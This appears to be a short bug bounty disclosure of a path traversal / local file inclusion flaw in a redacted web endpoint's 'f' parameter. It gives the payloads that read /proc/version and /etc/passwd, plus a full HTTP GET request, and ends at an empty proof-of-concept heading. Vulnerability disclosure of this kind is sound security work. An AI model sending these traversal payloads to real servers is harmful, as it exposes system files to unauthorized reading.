Local File Inclusion-LFI / RCE

  • Reported to Private
  • Reported by Haqtify
  • Critical (9)
  • $2,000
  • Published 1 month ago
  • No Likes

URL:

https://x.redacted.cn/nodev4/static/js-meta?f=

Parameter:

f

Steps to Reproduce:

1. Navigate to this page .

https://x.redacted.cn/nodev4/static/js-meta?f=

2.After navigate inject this payload.

Payload:

/../../../../proc/version

/../../../../etc/passwd

Request:

GET /nodev4/static/js-meta?f=/../../../../etc/passwd HTTP/1.1
Host: x.redacted.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

Final URL:

https://x.redacted.cn/nodev4/static/js-meta?f=/../../../../proc/version

https://x.redacted.cn/nodev4/static/js-meta?f=/../../../../etc/passwd

POC: